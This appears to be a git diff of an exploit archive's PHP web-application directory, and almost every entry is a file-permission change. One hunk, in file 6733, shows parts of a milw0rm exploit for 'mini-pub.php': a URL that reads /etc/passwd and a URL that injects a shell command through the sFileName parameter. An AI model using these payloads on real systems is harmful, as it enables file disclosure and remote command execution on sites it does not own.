old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6575.txt b/platforms/php/webapps/6575.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6576.txt b/platforms/php/webapps/6576.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6577.txt b/platforms/php/webapps/6577.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6578.txt b/platforms/php/webapps/6578.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6579.txt b/platforms/php/webapps/6579.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6580.txt b/platforms/php/webapps/6580.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6583.txt b/platforms/php/webapps/6583.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6584.txt b/platforms/php/webapps/6584.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6585.txt b/platforms/php/webapps/6585.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6586.txt b/platforms/php/webapps/6586.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6587.txt b/platforms/php/webapps/6587.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6589.txt b/platforms/php/webapps/6589.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6590.txt b/platforms/php/webapps/6590.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6591.txt b/platforms/php/webapps/6591.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6592.txt b/platforms/php/webapps/6592.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6593.txt b/platforms/php/webapps/6593.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6594.txt b/platforms/php/webapps/6594.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6595.txt b/platforms/php/webapps/6595.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6596.txt b/platforms/php/webapps/6596.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6598.txt b/platforms/php/webapps/6598.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6599.txt b/platforms/php/webapps/6599.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6601.txt b/platforms/php/webapps/6601.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6602.txt b/platforms/php/webapps/6602.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6603.txt b/platforms/php/webapps/6603.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6604.txt b/platforms/php/webapps/6604.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6605.txt b/platforms/php/webapps/6605.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6606.txt b/platforms/php/webapps/6606.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6607.txt b/platforms/php/webapps/6607.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6608.txt b/platforms/php/webapps/6608.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6611.php b/platforms/php/webapps/6611.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6612.txt b/platforms/php/webapps/6612.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6613.txt b/platforms/php/webapps/6613.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6617.txt b/platforms/php/webapps/6617.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6618.txt b/platforms/php/webapps/6618.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6620.txt b/platforms/php/webapps/6620.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6621.txt b/platforms/php/webapps/6621.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6623.txt b/platforms/php/webapps/6623.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6624.txt b/platforms/php/webapps/6624.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6625.txt b/platforms/php/webapps/6625.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6626.txt b/platforms/php/webapps/6626.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6628.txt b/platforms/php/webapps/6628.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6629.txt b/platforms/php/webapps/6629.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6631.txt b/platforms/php/webapps/6631.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6632.txt b/platforms/php/webapps/6632.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6633.txt b/platforms/php/webapps/6633.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6634.php b/platforms/php/webapps/6634.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6635.txt b/platforms/php/webapps/6635.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6636.txt b/platforms/php/webapps/6636.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6637.txt b/platforms/php/webapps/6637.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6639.txt b/platforms/php/webapps/6639.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6641.txt b/platforms/php/webapps/6641.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6642.txt b/platforms/php/webapps/6642.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6643.txt b/platforms/php/webapps/6643.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6644.txt b/platforms/php/webapps/6644.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6645.txt b/platforms/php/webapps/6645.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6646.php b/platforms/php/webapps/6646.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6648.txt b/platforms/php/webapps/6648.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6649.txt b/platforms/php/webapps/6649.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6650.txt b/platforms/php/webapps/6650.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6652.txt b/platforms/php/webapps/6652.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6653.txt b/platforms/php/webapps/6653.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6655.php b/platforms/php/webapps/6655.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6659.txt b/platforms/php/webapps/6659.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6663.txt b/platforms/php/webapps/6663.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6664.txt b/platforms/php/webapps/6664.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6667.txt b/platforms/php/webapps/6667.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6669.txt b/platforms/php/webapps/6669.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6670.txt b/platforms/php/webapps/6670.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6676.txt b/platforms/php/webapps/6676.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6678.txt b/platforms/php/webapps/6678.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6679.txt b/platforms/php/webapps/6679.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6680.txt b/platforms/php/webapps/6680.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6681.txt b/platforms/php/webapps/6681.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6682.txt b/platforms/php/webapps/6682.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6683.txt b/platforms/php/webapps/6683.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6684.txt b/platforms/php/webapps/6684.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6685.txt b/platforms/php/webapps/6685.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6691.txt b/platforms/php/webapps/6691.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6692.txt b/platforms/php/webapps/6692.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6693.txt b/platforms/php/webapps/6693.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6694.txt b/platforms/php/webapps/6694.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6695.txt b/platforms/php/webapps/6695.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6696.txt b/platforms/php/webapps/6696.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6697.txt b/platforms/php/webapps/6697.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6698.txt b/platforms/php/webapps/6698.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6700.txt b/platforms/php/webapps/6700.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6701.txt b/platforms/php/webapps/6701.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6702.txt b/platforms/php/webapps/6702.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6703.txt b/platforms/php/webapps/6703.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6706.php b/platforms/php/webapps/6706.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6707.txt b/platforms/php/webapps/6707.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6708.txt b/platforms/php/webapps/6708.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6709.txt b/platforms/php/webapps/6709.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6710.txt b/platforms/php/webapps/6710.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6711.htm b/platforms/php/webapps/6711.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6712.txt b/platforms/php/webapps/6712.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6713.txt b/platforms/php/webapps/6713.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6715.txt b/platforms/php/webapps/6715.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6721.txt b/platforms/php/webapps/6721.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6722.txt b/platforms/php/webapps/6722.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6723.txt b/platforms/php/webapps/6723.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6724.txt b/platforms/php/webapps/6724.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6728.txt b/platforms/php/webapps/6728.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6729.php b/platforms/php/webapps/6729.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6730.txt b/platforms/php/webapps/6730.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6733.txt b/platforms/php/webapps/6733.txt old mode 100755 new mode 100644 index 4639a2e83..6304557ee --- a/platforms/php/webapps/6733.txt +++ b/platforms/php/webapps/6733.txt @@ -15,5 +15,4 @@ http://localhost/mini-pub.php/front-end/cat.php?sFileName=/etc/passwd 3. command execution http://localhost/mini-pub.php/front-end/cat.php?sFileName=a%3Benv -# milw0rm.com [2008-10-12] - \ No newline at end of file +# milw0rm.com [2008-10-12] \ No newline at end of file diff --git a/platforms/php/webapps/6734.txt b/platforms/php/webapps/6734.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6735.php b/platforms/php/webapps/6735.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6736.txt b/platforms/php/webapps/6736.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6737.txt b/platforms/php/webapps/6737.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6739.txt b/platforms/php/webapps/6739.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6740.txt b/platforms/php/webapps/6740.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6744.txt b/platforms/php/webapps/6744.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6745.txt b/platforms/php/webapps/6745.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6746.txt b/platforms/php/webapps/6746.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6747.php b/platforms/php/webapps/6747.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6748.txt b/platforms/php/webapps/6748.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6749.php b/platforms/php/webapps/6749.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6751.txt b/platforms/php/webapps/6751.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6754.txt b/platforms/php/webapps/6754.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6755.php b/platforms/php/webapps/6755.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6758.txt b/platforms/php/webapps/6758.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6759.txt b/platforms/php/webapps/6759.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/676.c b/platforms/php/webapps/676.c old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6760.txt b/platforms/php/webapps/6760.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6762.txt b/platforms/php/webapps/6762.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6763.txt b/platforms/php/webapps/6763.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6764.php b/platforms/php/webapps/6764.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6765.txt b/platforms/php/webapps/6765.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6766.txt b/platforms/php/webapps/6766.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6767.txt b/platforms/php/webapps/6767.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6768.txt b/platforms/php/webapps/6768.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6770.txt b/platforms/php/webapps/6770.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6772.txt b/platforms/php/webapps/6772.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6777.txt b/platforms/php/webapps/6777.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6779.txt b/platforms/php/webapps/6779.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6780.txt b/platforms/php/webapps/6780.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6782.php b/platforms/php/webapps/6782.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6783.php b/platforms/php/webapps/6783.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6785.txt b/platforms/php/webapps/6785.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6788.txt b/platforms/php/webapps/6788.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6792.txt b/platforms/php/webapps/6792.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6795.txt b/platforms/php/webapps/6795.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6796.txt b/platforms/php/webapps/6796.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6797.txt b/platforms/php/webapps/6797.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6799.txt b/platforms/php/webapps/6799.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6802.txt b/platforms/php/webapps/6802.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6803.txt b/platforms/php/webapps/6803.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6806.txt b/platforms/php/webapps/6806.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6809.txt b/platforms/php/webapps/6809.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6811.txt b/platforms/php/webapps/6811.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6814.php b/platforms/php/webapps/6814.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6816.txt b/platforms/php/webapps/6816.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6817.txt b/platforms/php/webapps/6817.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6818.txt b/platforms/php/webapps/6818.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6819.txt b/platforms/php/webapps/6819.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6821.txt b/platforms/php/webapps/6821.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6822.txt b/platforms/php/webapps/6822.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6823.txt b/platforms/php/webapps/6823.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6826.txt b/platforms/php/webapps/6826.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6827.txt b/platforms/php/webapps/6827.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6829.txt b/platforms/php/webapps/6829.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6830.txt b/platforms/php/webapps/6830.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6833.txt b/platforms/php/webapps/6833.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6835.txt b/platforms/php/webapps/6835.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6836.txt b/platforms/php/webapps/6836.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6837.txt b/platforms/php/webapps/6837.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6839.txt b/platforms/php/webapps/6839.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6842.txt b/platforms/php/webapps/6842.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6843.txt b/platforms/php/webapps/6843.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6846.txt b/platforms/php/webapps/6846.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6847.txt b/platforms/php/webapps/6847.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6848.txt b/platforms/php/webapps/6848.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6849.txt b/platforms/php/webapps/6849.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6850.txt b/platforms/php/webapps/6850.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6853.txt b/platforms/php/webapps/6853.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6854.txt b/platforms/php/webapps/6854.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6855.txt b/platforms/php/webapps/6855.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6856.txt b/platforms/php/webapps/6856.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6857.txt b/platforms/php/webapps/6857.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6858.txt b/platforms/php/webapps/6858.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6859.txt b/platforms/php/webapps/6859.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6860.txt b/platforms/php/webapps/6860.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6862.txt b/platforms/php/webapps/6862.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6865.txt b/platforms/php/webapps/6865.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6869.txt b/platforms/php/webapps/6869.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6874.txt b/platforms/php/webapps/6874.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6876.txt b/platforms/php/webapps/6876.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6877.txt b/platforms/php/webapps/6877.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6879.txt b/platforms/php/webapps/6879.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6881.txt b/platforms/php/webapps/6881.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6882.txt b/platforms/php/webapps/6882.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6883.txt b/platforms/php/webapps/6883.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6885.txt b/platforms/php/webapps/6885.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6886.txt b/platforms/php/webapps/6886.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6887.txt b/platforms/php/webapps/6887.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6888.txt b/platforms/php/webapps/6888.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6889.txt b/platforms/php/webapps/6889.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6890.txt b/platforms/php/webapps/6890.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6891.txt b/platforms/php/webapps/6891.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6892.txt b/platforms/php/webapps/6892.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6893.txt b/platforms/php/webapps/6893.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6894.txt b/platforms/php/webapps/6894.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6895.txt b/platforms/php/webapps/6895.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6896.txt b/platforms/php/webapps/6896.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6897.txt b/platforms/php/webapps/6897.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6898.txt b/platforms/php/webapps/6898.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6900.txt b/platforms/php/webapps/6900.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6901.txt b/platforms/php/webapps/6901.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6902.txt b/platforms/php/webapps/6902.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6903.txt b/platforms/php/webapps/6903.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6904.txt b/platforms/php/webapps/6904.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6905.txt b/platforms/php/webapps/6905.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6906.txt b/platforms/php/webapps/6906.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6907.txt b/platforms/php/webapps/6907.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6908.txt b/platforms/php/webapps/6908.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6909.txt b/platforms/php/webapps/6909.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6910.txt b/platforms/php/webapps/6910.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6911.txt b/platforms/php/webapps/6911.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6912.txt b/platforms/php/webapps/6912.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6913.txt b/platforms/php/webapps/6913.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6914.txt b/platforms/php/webapps/6914.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6915.txt b/platforms/php/webapps/6915.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6916.txt b/platforms/php/webapps/6916.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6917.php b/platforms/php/webapps/6917.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6918.txt b/platforms/php/webapps/6918.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6919.txt b/platforms/php/webapps/6919.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6920.txt b/platforms/php/webapps/6920.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6922.txt b/platforms/php/webapps/6922.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6923.txt b/platforms/php/webapps/6923.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6924.txt b/platforms/php/webapps/6924.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6925.txt b/platforms/php/webapps/6925.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6928.txt b/platforms/php/webapps/6928.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6929.txt b/platforms/php/webapps/6929.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6930.txt b/platforms/php/webapps/6930.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6931.txt b/platforms/php/webapps/6931.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6932.txt b/platforms/php/webapps/6932.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6934.txt b/platforms/php/webapps/6934.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6935.txt b/platforms/php/webapps/6935.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6936.txt b/platforms/php/webapps/6936.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6937.txt b/platforms/php/webapps/6937.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6938.txt b/platforms/php/webapps/6938.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6939.txt b/platforms/php/webapps/6939.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6940.txt b/platforms/php/webapps/6940.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6941.txt b/platforms/php/webapps/6941.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6942.txt b/platforms/php/webapps/6942.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6943.txt b/platforms/php/webapps/6943.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6944.txt b/platforms/php/webapps/6944.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6945.txt b/platforms/php/webapps/6945.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6946.txt b/platforms/php/webapps/6946.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6947.txt b/platforms/php/webapps/6947.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6948.txt b/platforms/php/webapps/6948.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6949.txt b/platforms/php/webapps/6949.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6950.txt b/platforms/php/webapps/6950.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6951.txt b/platforms/php/webapps/6951.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6952.txt b/platforms/php/webapps/6952.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6953.txt b/platforms/php/webapps/6953.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6954.txt b/platforms/php/webapps/6954.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6955.txt b/platforms/php/webapps/6955.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6956.txt b/platforms/php/webapps/6956.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6957.txt b/platforms/php/webapps/6957.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6958.txt b/platforms/php/webapps/6958.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6960.txt b/platforms/php/webapps/6960.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6962.txt b/platforms/php/webapps/6962.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6964.txt b/platforms/php/webapps/6964.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6965.txt b/platforms/php/webapps/6965.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6966.txt b/platforms/php/webapps/6966.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6967.txt b/platforms/php/webapps/6967.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6968.txt b/platforms/php/webapps/6968.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6969.txt b/platforms/php/webapps/6969.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/697.c b/platforms/php/webapps/697.c old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6971.txt b/platforms/php/webapps/6971.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6972.txt b/platforms/php/webapps/6972.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6973.txt b/platforms/php/webapps/6973.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6974.txt b/platforms/php/webapps/6974.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6975.txt b/platforms/php/webapps/6975.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6976.txt b/platforms/php/webapps/6976.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6977.txt b/platforms/php/webapps/6977.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6978.txt b/platforms/php/webapps/6978.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6979.txt b/platforms/php/webapps/6979.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6980.txt b/platforms/php/webapps/6980.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6981.txt b/platforms/php/webapps/6981.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6982.txt b/platforms/php/webapps/6982.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6983.txt b/platforms/php/webapps/6983.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6984.txt b/platforms/php/webapps/6984.txt old mode 100755 new mode 100644 diff --git 